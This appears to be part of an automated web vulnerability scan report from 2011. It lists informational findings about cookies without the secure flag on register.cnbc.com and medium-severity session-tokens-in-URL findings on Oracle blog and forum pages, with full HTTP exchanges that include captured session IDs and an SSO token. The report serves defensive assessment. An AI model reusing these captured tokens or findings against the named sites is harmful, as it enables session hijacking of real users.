User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; JSESSIONID=7FFDB885E3232AE9759F6D0A6D01E627; s_cc=true; s_nr=1315339298449; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:40 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Wed, 06 May 2009 17:44:23 GMT
ETag: "3a40-46941f222cbc0"
Accept-Ranges: bytes
Content-Length: 14912
Cache-Control: max-age=86400
Expires: Wed, 07 Sep 2011 15:01:40 GMT
Connection: close
Content-Type: image/jpeg
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:40 GMT; path=/

......JFIF.....H.H.....    Exif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS3 Windows.2009:03:12 10:28:37.........
...[SNIP]...

7.57. https://register.cnbc.com/images/tile_02.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /images/tile_02.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/tile_02.gif HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: https://register.cnbc.com/forgotPassword.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; s_cc=true; s_nr=1315339307081; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSign-in%25257CDefault%25257CSite%252520Sign-in%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//register.cnbc.com/forgotpassword1.jsp%2526ot%253DA; JSESSIONID=2468AC9921E8E376640A3CB7840EC38E

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:50 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Thu, 31 Mar 2011 15:21:14 GMT
ETag: "2c-49fc8d80f4e80"
Accept-Ranges: bytes
Content-Length: 44
Cache-Control: max-age=86400
Expires: Wed, 07 Sep 2011 15:01:50 GMT
Connection: close
Content-Type: image/gif
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:50 GMT; path=/

GIF89a.......02;68@!.......,...........DnX.;

7.58. https://register.cnbc.com/images/wrong.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /images/wrong.jpg

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/wrong.jpg HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: https://register.cnbc.com/registerUser.do?iframe=yes&source=register
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; JSESSIONID=7FFDB885E3232AE9759F6D0A6D01E627; s_cc=true; s_nr=1315339298449; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:40 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Wed, 06 May 2009 17:44:23 GMT
ETag: "3d8b-46941f222cbc0"
Accept-Ranges: bytes
Content-Length: 15755
Cache-Control: max-age=86400
Expires: Wed, 07 Sep 2011 15:01:40 GMT
Connection: close
Content-Type: image/jpeg
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:40 GMT; path=/

......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS3 Windows.2009:03:12 10:43:29.........
...[SNIP]...

7.59. https://register.cnbc.com/js/membercenter.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /js/membercenter.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/membercenter.js HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: https://register.cnbc.com/forgotPassword.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; s_cc=true; s_nr=1315339307081; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSign-in%25257CDefault%25257CSite%252520Sign-in%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//register.cnbc.com/forgotpassword1.jsp%2526ot%253DA; JSESSIONID=2468AC9921E8E376640A3CB7840EC38E

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:49 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Wed, 06 May 2009 17:44:23 GMT
ETag: "13eb-46941f222cbc0"
Accept-Ranges: bytes
Content-Length: 5099
Connection: close
Content-Type: application/x-javascript
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:49 GMT; path=/

//This variable is the only one that needs to be changed when the free web cam offer expires
var freeWebCamOffer="false";
//var freeWebCamOffer="true";

//We need to use the db index of "United States
...[SNIP]...

7.60. https://register.cnbc.com/js/prototype_ajax.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /js/prototype_ajax.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/prototype_ajax.js HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: https://register.cnbc.com/registerUser.do?iframe=yes&source=register
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339139226; s_sq=%5B%5BB%5D%5D; __qseg=Q_D; JSESSIONID=7FFDB885E3232AE9759F6D0A6D01E627

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:37 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Wed, 06 May 2009 17:44:23 GMT
ETag: "1756a-46941f222cbc0"
Accept-Ranges: bytes
Content-Length: 95594
Connection: close
Content-Type: application/x-javascript
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:37 GMT; path=/

/* Prototype JavaScript framework, version 1.5.0
* (c) 2005-2007 Sam Stephenson
*
* Prototype is freely distributable under the terms of an MIT-style license.
* For details, see the Prototype
...[SNIP]...

7.61. https://register.cnbc.com/js/registrationBasic.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /js/registrationBasic.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/registrationBasic.js HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: https://register.cnbc.com/registerUser.do?iframe=yes&source=register
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339139226; s_sq=%5B%5BB%5D%5D; __qseg=Q_D; JSESSIONID=7FFDB885E3232AE9759F6D0A6D01E627

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:37 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Wed, 20 Jan 2010 20:57:35 GMT
ETag: "3e22-47d9ed5f8cdc0"
Accept-Ranges: bytes
Content-Length: 15906
Connection: close
Content-Type: application/x-javascript
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:37 GMT; path=/

//Field Validations - start
var goOptions = true;
var goAddrs1 = true;
var goAddrs2 = true;
var goPhone = true;
var goHhi = true;
var goIndustry = true;
var goStDsc = true;
var goCity = true;
...[SNIP]...

7.62. https://register.cnbc.com/js/registrationUtils.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /js/registrationUtils.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/registrationUtils.js HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: https://register.cnbc.com/registerUser.do?iframe=yes&source=register
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339139226; s_sq=%5B%5BB%5D%5D; __qseg=Q_D; JSESSIONID=7FFDB885E3232AE9759F6D0A6D01E627

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:37 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Tue, 11 Aug 2009 10:38:41 GMT
ETag: "7cf-470db4e522e40"
Accept-Ranges: bytes
Content-Length: 1999
Connection: close
Content-Type: application/x-javascript
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:37 GMT; path=/

function toggleMessage(show, hide1, hide2){
var showObj = document.getElementById(show);
var hideObj1 = document.getElementById(hide1);
var hideObj2 = document.getElementById(hide2);
hideObj1.
...[SNIP]...

7.63. https://register.cnbc.com/js/registrationValidations.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /js/registrationValidations.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/registrationValidations.js HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: https://register.cnbc.com/registerUser.do?iframe=yes&source=register
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339139226; s_sq=%5B%5BB%5D%5D; __qseg=Q_D; JSESSIONID=7FFDB885E3232AE9759F6D0A6D01E627

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:37 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Wed, 20 Jan 2010 20:57:35 GMT
ETag: "1dac-47d9ed5f8cdc0"
Accept-Ranges: bytes
Content-Length: 7596
Connection: close
Content-Type: application/x-javascript
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:37 GMT; path=/

//Field Validations - start
var goEmail = true;
var goEmailConf = true;
var goPwd = true;
var goPwdConf = true;
var goSecQstn = true;
var goSecAns = true;
var goScrnNm = true;
var goFrstNm = true;
var
...[SNIP]...

7.64. https://register.cnbc.com/js/s_code.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /js/s_code.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/s_code.js HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: https://register.cnbc.com/forgotPassword.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; s_cc=true; s_nr=1315339307081; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSign-in%25257CDefault%25257CSite%252520Sign-in%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//register.cnbc.com/forgotpassword1.jsp%2526ot%253DA; JSESSIONID=2468AC9921E8E376640A3CB7840EC38E; TZM=-300

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:51 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Thu, 31 Mar 2011 15:21:14 GMT
ETag: "68d6-49fc8d80f4e80"
Accept-Ranges: bytes
Content-Length: 26838
Connection: close
Content-Type: application/x-javascript
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:51 GMT; path=/

/* SiteCatalyst code version: H.2.
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com */
/* Specify the Report Suite ID(s) to track here FEBRUARY 19 2008 UPDATE NBCU CMJ
...[SNIP]...

7.65. https://register.cnbc.com/js/validation.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /js/validation.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/validation.js HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: https://register.cnbc.com/registerUser.do?iframe=yes&source=register
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339139226; s_sq=%5B%5BB%5D%5D; __qseg=Q_D; JSESSIONID=7FFDB885E3232AE9759F6D0A6D01E627

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:37 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Wed, 29 Jul 2009 18:48:54 GMT
ETag: "184e-46fdca3891180"
Accept-Ranges: bytes
Content-Length: 6222
Connection: close
Content-Type: application/x-javascript
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:37 GMT; path=/

// JavaScript Document
Validation = Class.create();
Validation.prototype = {
initialize: function(parameters, timeout, controls, responsetxt ){
    this.parameters            = this.generateParameterList(
...[SNIP]...

7.66. https://register.cnbc.com/quote-html-webservice/fvquote.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /quote-html-webservice/fvquote.htm

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /quote-html-webservice/fvquote.htm HTTP/1.1
Host: register.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 15:05:48 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Length: 231
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:48 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /quote-html-webservice/fvquote.htm was not found on t
...[SNIP]...

7.67. https://register.cnbc.com/quote-html-webservice/quote.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /quote-html-webservice/quote.htm

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /quote-html-webservice/quote.htm HTTP/1.1
Host: register.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 15:05:48 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Length: 229
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:48 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /quote-html-webservice/quote.htm was not found on thi
...[SNIP]...

7.68. https://register.cnbc.com/refreshlogin.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /refreshlogin.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /refreshlogin.jsp?source=header&service=http://www.cnbc.com/ HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; TZM=-300; JSESSIONID=30F7657E561A5A03E5B11ABE0843E7D5; s_cc=true; __qseg=Q_D; s_nr=1315339382427; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DFront%25257CHome%25257Chomeus%25257C15839285%25257CStock%252520Market%252520News%25252C%252520Business%252520News%25252C%252520Financial%25252C%252520Earni%2526pidt%253D1%2526oid%253Dhttp%25253A//www.cnbc.com/%252523%2526ot%253DA; cnbc_regional_cookie=US

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 06 Sep 2011 15:03:06 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Location: https://login.cnbc.com/cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&source=header&login_view=header
Content-Length: 0
Connection: close
Content-Type: text/plain
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:03:06 GMT; path=/


8. Session token in URL
There are 42 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


8.1. http://blogs.oracle.com/roller-ui/cwpLogin.jsp

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://blogs.oracle.com
Path:   /roller-ui/cwpLogin.jsp

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /roller-ui/cwpLogin.jsp HTTP/1.1
Host: blogs.oracle.com
Proxy-Connection: keep-alive
Referer: http://blogs.oracle.com/otn/entry/bea_welcome_and_oracles_middle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; JSESSIONID=N62MTmHFyVjP3vlZCyTSrpWsKDhTVl78pvQh5p14CnPctL0GvTWg!682060306; s_pers=%20s_nr%3D1315343775191%7C1317935775191%3B%20gpv_p24%3Dno%2520value%7C1315345575196%3B%20gpw_e24%3Dno%2520value%7C1315345575201%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleotnlive%253D%252526pid%25253Dotn%2525253Aen-us%2525253A%2525252Fcommunity%2525252Fdeveloper-vm%2525252F%252526pidt%25253D1%252526oid%25253Dotn%2525253Aen%2525253Ahnav%2525253Astore%2525253Astoredatabase%2525253Astoredatabaseseeall%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; s_nr=1315343778351; gpw_e24=http%3A%2F%2Fblogs.oracle.com%2Fotn%2Fentry%2Fbea_welcome_and_oracles_middle; s_sq=oracleblogs%2Coracleglobal%3D%2526pid%253Dblogs%25253Aen-us%25253A%25252Fotn%25252Fentry%25252Fbea_welcome_and_oracles_middle%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fblogs.oracle.com%25252Froller-ui%25252Flogin-redirect.rol%2526ot%253DA

Response

HTTP/1.1 302 Moved Temporarily
Location: https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.2~15AB5291~CA7268AF16FDDCD6192ED08700B7C3B3CA2E1B23878BCD93247A950FAAA266F9D7A7C11B2586EEC1681E7C0613B1F158706D3CA7C179F2B6A77573D5C53030D02597238CD1C3E0212AE912A5703E640DF935186B51AB3DFAEEE7B2A7E20FF4542015DBB0457891C5A4461CB4B4A23EB51909CE24B245C0A7CB1A8EBE5AC1C84D4342665B366BF177D22BAC7C46B7421C202F9871EF6C385B9C84ABA7DAB0DE4470E2A9204FA9C682
X-Robots-Tag: noindex,follow
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Content-Language: en
X-Oracle-DMS-ECID: 51624319760812530
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (N;ecid=51624319760812530,0:1)
Content-Length: 1065
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:16:18 GMT
Connection: close
Set-Cookie: OHS-blogs.oracle.com=; path=/

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.2~15AB5291~CA7268AF16FDDCD6192ED08700B7C3B3CA2E1B23878BCD93247A950FAAA266F9D7A7C11B2586EEC1681E7C0613B1F158706D3CA7C179F2B6A77573D5C53030D02597238CD1C3E0212AE912A5703E640DF935186B51AB3DFAEEE7B2A7E20FF4542015DBB0457891C5A4461CB4B4A23EB51909CE24B245C0A7CB1A8EBE5AC1C84D4342665B366BF177D22BAC7C46B7421C202F9871EF6C385B9C84ABA7DAB0DE4470E2A9204FA9C682">https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.2~15AB5291~CA7268AF16FDDCD6192ED08700B7C3B3CA2E1B23878BCD93247A950FAAA266F9D7A7C11B2586EEC1681E7C0613B1F158706D3C
...[SNIP]...

8.2. https://forums.oracle.com/forums/category.jspa

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://forums.oracle.com
Path:   /forums/category.jspa

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /forums/category.jspa?categoryID=18 HTTP/1.1
Host: forums.oracle.com
Connection: keep-alive
Referer: http://www.oracle.com/technetwork/index.html?ssSourceSiteId=ocomen
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343572368; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-10g
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Content-Length: 123998
Date: Tue, 06 Sep 2011 16:13:12 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: JSESSIONID=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0; path=/forums
Set-Cookie: BIGipServerforums_prod_pool=202412685.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>

<head>


<title>OTN Discussion Forums : Database</title>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<link rel="stylesheet" type="text/css" href="/forums/style/style.jsp;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0" />
<link rel="stylesheet" type="text/css" href="/forums/themes/english/resources/style.css;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0" />
<link rel="stylesheet" type="text/css" href="/forums/themes/english/resources/otn_new.css;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0" />
<link rel="alternate" type="application/rss+xml" title="RSS"
href="http://forums.oracle.com/forums/rss/rssmessages.jspa?categoryID=18">
...[SNIP]...
<A HREF="http://www.oracle.com/technology/index.html"><IMG SRC="/forums/themes/english/resources/oralogo_small.gif;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0" hspace="10" BORDER=0 ALT="Forums.Oracle.com"></a>
...[SNIP]...
